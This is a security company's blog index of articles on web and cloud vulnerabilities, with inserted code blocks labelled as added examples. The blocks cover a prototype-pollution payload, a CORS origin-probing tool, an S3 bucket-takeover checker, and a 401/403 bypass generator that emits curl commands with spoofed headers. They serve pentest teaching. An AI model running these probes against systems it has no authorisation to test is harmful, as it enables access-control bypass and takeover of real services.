VIDOC

© 2025 Vidoc Security Lab

JUL 29, 2025   |   1 MIN READ

LLMs became dangerously good for cybersecurity

LLMs can now reliably spot real-world zero-day vulnerabilities through brute-force patience – this deep-dive explains why that's both impressive and alarming.

Dawid Moczadło
MAR 27, 2025   |   2 MIN READ

Fake Engineer - Advanced Deepfake Fraud and How to Detect It

The candidate applied for an open backend position at our company, Vidoc Security Lab. He had a decent CV and LinkedIn profile but used a deepfake during the coding interview, pretending to be a different person. This incident could be linked to a North Korean hacker group that has used this trick with many other companies.

Klaudia
JUN 11, 2024   |   2 MIN READ

API Security: Best Practices for Python Developers - Part II

Part II of the Developer's Guide to secure API implementation. Devs are the core of web applications, which is why you should keep learning how to prevent common attacks and secure your endpoints correctly. Avoid deploying vulnerable code by taking these security best practices into account.

Oriana Olivetti
MAY 29, 2024   |   1 MIN READ

Why Dependency Security Is Your First Line of Defense Against Cyber Threats

Explore the technical essentials of Software Composition Analysis (SCA) and dependency scanning, crucial tools for securing software against cyber threats in AI-driven development environments.

Oriana Olivetti
MAY 15, 2024   |   1 MIN READ

Beginner's Guide to Client Prototype Pollution Vulnerabilities

The perfect introduction for anyone wanting to understand prototype pollution vulnerabilities and exploits. Not everyone knows how objects in JavaScript work, but we are about to change that! Are you up for the challenge?

Oriana Olivetti
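As an added example (not code from the Vidoc guide), here is the pattern the guide is about: a recursive merge that copies attacker-controlled JSON into an object without filtering __proto__, next to a hardened merge that refuses the keys that reach the prototype chain. The PAYLOAD string and the isAdmin "gadget" are constructed for this illustration.

```javascript
// Vulnerable: a recursive merge that treats "__proto__" like any other key.
// JSON.parse turns {"__proto__": {...}} into an own property literally named
// "__proto__", and target["__proto__"] resolves to Object.prototype, so the
// recursion writes the attacker's keys onto the prototype every object shares.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (typeof value === 'object' && value !== null) {
      if (typeof target[key] !== 'object' || target[key] === null) target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened: drop the keys that reach the prototype chain and only recurse
// into properties the target object owns itself.
const POLLUTING_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (POLLUTING_KEYS.has(key)) continue;
    const value = source[key];
    if (typeof value === 'object' && value !== null && !Array.isArray(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || typeof target[key] !== 'object' || target[key] === null) target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed attacker input, e.g. a JSON body merged into stored user settings.
const PAYLOAD = '{"name":"alice","__proto__":{"isAdmin":true}}';

// Merge the payload, then check whether an unrelated object created afterwards
// inherits the planted flag (the "gadget" a later `if (user.isAdmin)` would trust).
function demo(mergeFn) {
  const user = mergeFn({}, JSON.parse(PAYLOAD));
  const unrelated = {};
  const result = { nameKept: user.name === 'alice', polluted: unrelated.isAdmin === true };
  delete Object.prototype.isAdmin; // undo any pollution so the next run starts clean
  return result;
}

console.log('unsafeMerge:', demo(unsafeMerge)); // polluted: true
console.log('safeMerge:  ', demo(safeMerge));   // polluted: false
```

The important detail is that the property lands on Object.prototype, not on the merged object: code anywhere else in the process that checks user.isAdmin on a fresh object now sees true. Run it with node to watch the unrelated object change.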
APR 30, 2024   |   1 MIN READ

Pentesting Cross-Origin Resource Sharing (CORS) Vulnerabilities

Beginner's guide to this common security misconfiguration. Here you'll find the steps to quickly spot and exploit CORS vulnerabilities out in the wild. Shall we start?

Oriana Olivetti
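Added example, not from the Vidoc article: the "spot it" step as code. probeOrigins builds the Origin values a tester sends to expose a weak allow-list, and classifyCors rates what comes back. The target https://api.example.com and the two stand-in backends (buggyResponder with an end-anchored regex, fixedResponder with an exact allow-list) are constructed for the illustration; nothing is sent over the network.

```javascript
// Origins a tester sends to learn how the allow-list is implemented. Each one
// targets a different weak check: reflect-anything, trusted "null", regex
// anchored only at the start, regex anchored only at the end, scheme ignored.
function probeOrigins(targetOrigin) {
  const host = new URL(targetOrigin).hostname;
  return [
    'https://evil.example',
    'null',
    `https://${host}.evil.example`,
    `https://evil${host}`,
    `http://${host}`,
  ];
}

// Decide what a response means for the origin that was sent.
// Header names are matched case-insensitively; values as the server returned them.
function classifyCors(sentOrigin, headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const acao = h['access-control-allow-origin'];
  const withCreds = String(h['access-control-allow-credentials'] || '').toLowerCase() === 'true';
  if (acao === undefined) return { finding: 'none', severity: 'info' };
  if (acao === '*') {
    // Browsers refuse "*" together with credentials, so this only exposes public data.
    return { finding: 'wildcard', severity: 'info' };
  }
  if (acao !== sentOrigin) return { finding: 'none', severity: 'info' };
  if (sentOrigin === 'null') {
    return { finding: 'null-origin-trusted', severity: withCreds ? 'high' : 'low' };
  }
  // Our probe origin came back verbatim: a page on that origin can read responses,
  // and with credentials it reads them as the logged-in victim.
  return { finding: 'origin-reflected', severity: withCreds ? 'high' : 'low' };
}

// Send every probe to a responder and keep only the hits.
function runProbes(targetOrigin, responder) {
  return probeOrigins(targetOrigin)
    .map((origin) => ({ origin, ...classifyCors(origin, responder(origin)) }))
    .filter((r) => r.finding !== 'none');
}

// Constructed stand-in for a backend whose allow-list regex is anchored only at the end.
function buggyResponder(origin) {
  if (/example\.com$/.test(origin)) {
    return { 'Access-Control-Allow-Origin': origin, 'Access-Control-Allow-Credentials': 'true', Vary: 'Origin' };
  }
  return {};
}

// Fixed: exact match of the full origin (scheme, host and port) against a fixed list.
const ALLOWED_ORIGINS = new Set(['https://app.example.com']);
function fixedResponder(origin) {
  if (ALLOWED_ORIGINS.has(origin)) {
    return { 'Access-Control-Allow-Origin': origin, 'Access-Control-Allow-Credentials': 'true', Vary: 'Origin' };
  }
  return {};
}

console.log(runProbes('https://api.example.com', buggyResponder)); // two "origin-reflected" highs
console.log(runProbes('https://api.example.com', fixedResponder)); // []
```

Against a live target, replace the responder with a function that performs the request and returns the response headers; the classification logic stays the same. The evilapi.example.com and http://api.example.com hits are exactly what an end-anchored regex lets through.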
APR 9, 2024   |   1 MIN READ

State of Security Automation

SAST tools overlook more than 85% of CVEs in real-world scenarios. Outdated security automation can't keep pace with rapid code development, and it carries a hidden cost: validating false positives.

Dawid Moczadło
APR 2, 2024   |   1 MIN READ

The Developer's Guide to Effective Secrets Management

Discover how to safeguard your applications with effective secrets management. Learn about the challenges of secrets detection and how Vidoc Security Lab's AI Security Engineer can revolutionize your security measures against AI-generated code threats.

Oriana Olivetti
MAR 26, 2024   |   2 MIN READ

API Security: Best Practices for Python Developers - Part I

Developer's Guide to secure API implementation. Devs are the core of web applications; however, they are also the ones who end up introducing and deploying the vulnerabilities that later get exploited. That's why you should know how to prevent common attacks and secure your endpoints correctly.

Oriana Olivetti
MAR 14, 2024   |   1 MIN READ

SAST vs. DAST: Choosing the Right Security Testing for Your Project

Distinguishing between SAST and DAST is crucial for any robust security strategy. Using both scans together ensures that your software stays secure throughout its lifecycle, mitigating risks and vulnerabilities in today's fast-paced digital environment.

Oriana Olivetti
FEB 29, 2024   |   1 MIN READ

AI Pentesting vs Automated Penetration Testing

In the rapidly evolving cybersecurity landscape, where the emergence of AI-generated code presents unprecedented challenges, the concept of automated penetration testing emerges as a beacon of innovation and efficiency.

Oriana Olivetti
FEB 20, 2024   |   2 MIN READ

Why you never get Reflected XSS to execute: Balancing Payloads

Beginner's guide to reflected XSS. Everyone talks about the different XSS cheat sheets, and then you are supposed to try the payloads one by one to see if any of them execute on your target. We don't like that: it's time-consuming and mindless.

Oriana Olivetti
JAN 10, 2024   |   1 MIN READ

AWS S3 Bucket Takeover - how to find it and maximize impact?

The impact of an AWS S3 bucket takeover can range from none, through account takeover, all the way up to RCE. In this article, we'll tell you how to find it and maximize its impact.

Greg
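As an added example (not the article's own code), here is the "how to find it" step as a function: given a hostname, the CNAME it resolves to and the response the S3 endpoint returned, decide whether the bucket is gone and whether its name can be registered by someone else. The hosts, CNAMEs and response bodies in SAMPLES are constructed; the two error formats parsed are the ones S3's REST (XML) and static-website (plain text) endpoints return, and the region/bucket-name rules follow AWS's published naming rules.

```javascript
// Matches S3 REST and static-website endpoints in any region and captures the
// bucket label when the host is virtual-hosted (bucket.s3[...].amazonaws.com).
const S3_HOST_RE = /^(?:(?<bucket>[a-z0-9.-]{3,63})\.)?s3(?:-website)?(?:[.-][a-z0-9-]+)?\.amazonaws\.com$/i;

// Bucket names: 3-63 chars, lowercase letters, digits, dots, hyphens, no "..",
// starting and ending alphanumeric, and not shaped like an IPv4 address.
const BUCKET_NAME_RE = /^(?!\d+\.\d+\.\d+\.\d+$)(?!.*\.\.)[a-z0-9](?:[a-z0-9.-]{1,61}[a-z0-9])?$/;

// Region named in the endpoint; the legacy global endpoint s3.amazonaws.com maps to us-east-1.
function s3Region(cname) {
  const m = /s3(?:-website)?[.-]([a-z]{2}-[a-z]+-\d)\.amazonaws\.com$/i.exec(cname);
  return m ? m[1].toLowerCase() : 'us-east-1';
}

// Pull the error code and bucket name out of either S3 error format:
//   REST:    <Error><Code>NoSuchBucket</Code>...<BucketName>x</BucketName>...
//   Website: "404 Not Found ... Code: NoSuchBucket ... BucketName: x ..."
function parseS3Error(body) {
  const code = body.match(/<Code>([^<]+)<\/Code>/) || body.match(/Code:\s*([A-Za-z]+)/);
  if (!code) return null;
  const bucket = body.match(/<BucketName>([^<]+)<\/BucketName>/) || body.match(/BucketName:\s*([A-Za-z0-9.-]+)/);
  return { code: code[1], bucket: bucket ? bucket[1] : null };
}

// Takeover needs all three: a CNAME into S3, a NoSuchBucket answer, and a bucket
// name that AWS will let you create. AccessDenied means the bucket exists.
function assessTakeover({ host, cname, status, body }) {
  const endpoint = S3_HOST_RE.exec(cname || '');
  if (!endpoint) return { claimable: false, reason: 'CNAME does not point at S3' };
  const err = parseS3Error(body || '');
  if (status === 403 || (err && err.code === 'AccessDenied')) {
    return { claimable: false, reason: 'bucket exists (AccessDenied), nothing to register' };
  }
  if (status !== 404 || !err || err.code !== 'NoSuchBucket') {
    return { claimable: false, reason: `no NoSuchBucket error (status ${status})` };
  }
  // Bucket to register: the one named in the error, else the virtual-host label,
  // else the site hostname itself (website endpoints require that exact name).
  const bucket = err.bucket || (endpoint.groups && endpoint.groups.bucket) || host;
  if (!BUCKET_NAME_RE.test(bucket)) {
    return { claimable: false, reason: `"${bucket}" is not a registrable bucket name` };
  }
  return { claimable: true, bucket, region: s3Region(cname), reason: 'NoSuchBucket behind a dangling S3 CNAME' };
}

// Constructed recon output, shaped like what a DNS + HTTP pass would hand you.
const SAMPLES = [
  {
    host: 'assets.example.com',
    cname: 'assets.example.com.s3-website-eu-west-1.amazonaws.com',
    status: 404,
    body: '404 Not Found\nCode: NoSuchBucket\nMessage: The specified bucket does not exist\nBucketName: assets.example.com\nRequestId: 0000000000000000',
  },
  {
    host: 'cdn.example.com',
    cname: 'cdn.example.com.s3.amazonaws.com',
    status: 404,
    body: '<?xml version="1.0" encoding="UTF-8"?><Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>cdn.example.com</BucketName><RequestId>0000000000000000</RequestId></Error>',
  },
  {
    host: 'files.example.com',
    cname: 'files.example.com.s3.amazonaws.com',
    status: 403,
    body: '<Error><Code>AccessDenied</Code><Message>Access Denied</Message></Error>',
  },
  { host: 'www.example.com', cname: 'www.example.com.cdn.cloudflare.net', status: 404, body: 'not found' },
];

function findClaimable(samples) {
  return samples.map((s) => ({ host: s.host, ...assessTakeover(s) })).filter((r) => r.claimable);
}

console.log(findClaimable(SAMPLES)); // assets.example.com (eu-west-1) and cdn.example.com (us-east-1)
```

The region matters: a website-endpoint CNAME only serves a bucket created in that region, so a would-be claimant (and therefore your triage) must create it there. Feed real DNS answers and HTTP responses into assessTakeover to use it on a live scope.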
OCT 30, 2023   |   1 MIN READ

Security of new features in Next.js 14 - Server Actions, Taints

Next.js 14 (and 13) introduced many attack vectors without providing the tooling organizations need to detect them. It is easier than ever to expose server secrets, introduce unauthenticated "endpoints", or ship any other issue that leaves you vulnerable.

Dawid Moczadło
OCT 24, 2023   |   1 MIN READ

Escalating debug mode in Django to RCE, SSRF, SQLi

Security implications of DEBUG = True in Django's settings, from an ethical hacker's perspective.

Dawid Moczadło
SEP 27, 2023   |   1 MIN READ

Vidoc Secures Funding from bValue!

Vidoc Security Lab has secured an investment from bValue, a leading player in venture capital and technology innovation.

Klaudia
JUN 6, 2023   |   1 MIN READ

Vidoc - Notifications and Collab Feature Release

We implemented Notification and Collaboration features. Here's how they work and how they can benefit your research.

Klaudia
MAY 9, 2023   |   3 MIN READ

Ultimate 401 and 403 bypass methods

As a security researcher, I absolutely love the rush of discovering a suspicious endpoint during reconnaissance (which is super easy with the Vidoc Research tool ;). It's exciting to think that you might have stumbled upon something important. However, that excitement can quickly turn into frustration when you're met with a 401 or 403 HTTP response code. Trust me, I've been there. But, over time, I've learned that there are ways to work around these error codes. I want to share some practical tips and techniques that I learned doing research, along with links to modules you can run in Vidoc Research to try to bypass 401 and 403 responses.

Klaudia
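An added example, not from the post and not one of the Vidoc Research modules it links to: a generator for the kinds of 401/403 probe variants a tester tries (path tricks, proxy rewrite headers, IP-trust headers, alternate verbs), a triage rule for the responses, and a curl renderer. The path /api/admin/users and the baseline sizes in the comments are assumed for the illustration.

```javascript
// Request variants worth sending to a path that answered 401/403. Each entry
// names the weakness it probes so that a hit is easy to explain in a report.
function bypassVariants(path, method = 'GET') {
  const trimmed = path.replace(/\/+$/, '') || '/';
  const segs = trimmed.split('/').filter(Boolean);
  const last = segs[segs.length - 1] || '';
  const parent = '/' + segs.slice(0, -1).join('/');
  const under = (p) => (parent === '/' ? `/${p}` : `${parent}/${p}`);
  const hexFirst = last ? `%${last.charCodeAt(0).toString(16).padStart(2, '0')}${last.slice(1)}` : last;

  const pathVariants = [
    [`${trimmed}/`, 'trailing slash'],
    [`${trimmed}/.`, 'trailing dot segment'],
    [`${trimmed}//`, 'doubled slash'],
    [`${trimmed}%20`, 'trailing encoded space'],
    [`${trimmed}%09`, 'trailing encoded tab'],
    [`${trimmed}?`, 'empty query string'],
    [`${trimmed}..;/`, 'path parameter plus parent traversal (Tomcat style)'],
    [under(`${last};`), 'path parameter appended to last segment'],
    [under(`${last}.json`), 'extension appended (suffix routing)'],
    [under(last.toUpperCase()), 'case change on last segment'],
    [under(hexFirst), 'percent-encoded first byte of last segment'],
    [under(`./${last}`), 'dot segment inside the path'],
    [under(`%2e/${last}`), 'encoded dot segment inside the path'],
  ];
  const headerVariants = [
    ['/', { 'X-Original-URL': trimmed }, 'front proxy honours X-Original-URL'],
    ['/', { 'X-Rewrite-URL': trimmed }, 'front proxy honours X-Rewrite-URL'],
    [trimmed, { 'X-Forwarded-For': '127.0.0.1' }, 'IP allow-list trusts X-Forwarded-For'],
    [trimmed, { 'X-Custom-IP-Authorization': '127.0.0.1' }, 'IP allow-list trusts X-Custom-IP-Authorization'],
  ];
  const methods = ['POST', 'HEAD', 'OPTIONS', 'PUT'].filter((m) => m !== method);
  return [
    ...pathVariants.map(([p, why]) => ({ method, path: p, headers: {}, why })),
    ...headerVariants.map(([p, headers, why]) => ({ method, path: p, headers, why })),
    { method: 'POST', path: trimmed, headers: { 'X-HTTP-Method-Override': method }, why: 'POST passes the rule, override header restores the original verb' },
    ...methods.map((m) => ({ method: m, path: trimmed, headers: {}, why: `verb ${m} not covered by the rule` })),
  ];
}

// Compare a variant's response with the original denial. A 2xx whose body is the
// same size as the 403 page is usually a soft 403, not a bypass; a redirect where
// you were denied before is worth following but is not a result by itself.
function triage(baseline, response) {
  if (response.status >= 400) return 'denied';
  if (response.status >= 300) return 'review';
  return response.length === baseline.length ? 'soft-403' : 'bypass';
}

// Render a variant as a curl command. --path-as-is keeps ./ and ../ sequences,
// which curl would otherwise normalise away before sending.
function toCurl(base, v) {
  const headers = Object.entries(v.headers).map(([k, val]) => ` -H '${k}: ${val}'`).join('');
  const verb = v.method === 'HEAD' ? ' -I' : ` -X ${v.method}`;
  return `curl -s --path-as-is -o /dev/null -w '%{http_code} %{size_download}\\n'${verb}${headers} '${base}${v.path}'`;
}

for (const v of bypassVariants('/api/admin/users')) {
  console.log(toCurl('https://target.example', v), '  #', v.why);
}
console.log(triage({ status: 403, length: 146 }, { status: 200, length: 5120 })); // bypass
```

Record the status and body size of the original denial first, then feed each variant's status and size to triage; only a 2xx with a different body size is worth a closer look, and even that needs manual confirmation that the response really is the protected content.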
FEB 6, 2023   |   1 MIN READ

How we made $120k bug bounty in a year with good automation

2022 was very busy for several reasons; today we want to show you what we did and learned doing large-scale bug bounty hunting.

Klaudia
FEB 1, 2023   |   1 MIN READ

Introducing the New and Improved Web-Based Security Tool

TL;DR: We improved Active Recon and the data search option, changed the payment system to a subscription model, introduced module-based security scanning with nuclei-like templates, and introduced the Module Editor.

Klaudia
NOV 3, 2022   |   2 MIN READ

Why good Recon is hard, and how we make it easy

What sucks the most about doing recon? It all started with that one tweet ;) Inspired by Greg's post, we decided to write a summary of common problems with recon and why Vidoc Research, our tool for security researchers, solves them all.

Klaudia
SEP 24, 2022   |   2 MIN READ

Vidoc - a hacking platform

TL;DR: The Vidoc platform will allow you to find new targets, test your payloads and collaborate with other professionals. The application security recon tool and scanner we are working on is dedicated to modern web applications. Our goal is to make large-scale research affordable and easy for everybody.

Klaudia
MAY 16, 2022   |   1 MIN READ

Hacking Swagger-UI - from XSS to account takeovers

We have reported more than 60 instances of this bug across a wide range of bug bounty programs, including those of companies like PayPal, Atlassian, Microsoft, GitLab, Yahoo, ...

Dawid Moczadło